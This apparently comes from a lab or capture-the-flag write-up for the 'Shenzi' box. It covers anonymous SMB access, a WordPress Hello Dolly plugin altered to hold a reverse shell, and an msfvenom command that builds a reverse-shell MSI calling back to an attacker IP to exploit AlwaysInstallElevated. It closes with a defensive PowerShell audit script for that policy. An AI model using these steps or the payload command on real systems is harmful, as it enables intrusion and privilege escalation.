🪟Shenzi

IP: 192.168.73.55

Enumeration

Nmap scan

nmap 192.168.73.55 -sV -p- -A

Service Enumeration

TCP/135/445

SMB allows anonymous connection.

Passwords.txt

why.tmp

TCP/80/443

PHPInfo has a lot of information. https://shenzi.com/dashboard/phpinfo.php

Found WordPress site at /shenzi. Uploaded reverse shell code into Hello Dolly (hello.php). Ran the reverse shell by navigating to http://192.168.73.55/shenzi/wp-content/plugins/hello.php

Shell

Systeminfo

Found that AlwaysInstallElevated is enabled.

Created reverse shell MSI. Chose port 21 because I know it's already open.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.73 LPORT=21 -f msi -o exp3.msi

Curled the installer to shenzi's desktop and ran exp3.msi
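For the defensive side of the AlwaysInstallElevated finding above, here is an added audit example (not part of the original notes). It reads the policy value from both registry hives, since the policy is only effective when it is set to 1 in HKLM and HKCU, and lists recent Windows Installer activity from the Application log. The function name `Get-AlwaysInstallElevatedState` and the 24-hour window are assumptions made for illustration.

```powershell
# Added example: audit the AlwaysInstallElevated policy on the local host.
# The policy only takes effect when the value is 1 in BOTH HKLM and HKCU.
function Get-AlwaysInstallElevatedState {   # hypothetical helper name
    [CmdletBinding()]
    param()

    $subKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $name   = 'AlwaysInstallElevated'
    $found  = @{}

    foreach ($hive in 'HKLM', 'HKCU') {
        $path = "${hive}:\$subKey"
        # The key or the value may be absent; treat that as "not set" ($null).
        $item = Get-ItemProperty -Path $path -Name $name -ErrorAction SilentlyContinue
        $found[$hive] = if ($null -ne $item) { $item.$name } else { $null }
    }

    [pscustomobject]@{
        ComputerName = $env:COMPUTERNAME
        User         = "$env:USERDOMAIN\$env:USERNAME"   # HKCU is per user
        HKLM         = $found['HKLM']
        HKCU         = $found['HKCU']
        Effective    = ($found['HKLM'] -eq 1 -and $found['HKCU'] -eq 1)
    }
}

$state = Get-AlwaysInstallElevatedState
$state | Format-List

if ($state.Effective) {
    Write-Warning ('AlwaysInstallElevated is active: MSI packages run by this user ' +
                   'install with elevated privileges. Disable the policy in both hives.')
}

# Review recent MSI activity (assumed window: last 24 hours).
# MsiInstaller event 1040 marks the start of an installer transaction,
# 1033 records a completed product installation.
Get-WinEvent -FilterHashtable @{
    LogName      = 'Application'
    ProviderName = 'MsiInstaller'
    Id           = 1033, 1040
    StartTime    = (Get-Date).AddHours(-24)
} -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, Message |
    Format-List
```

The HKCU result applies only to the account running the script, so run it in the context of each user whose policy state matters, or check the setting centrally through Group Policy.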

Root
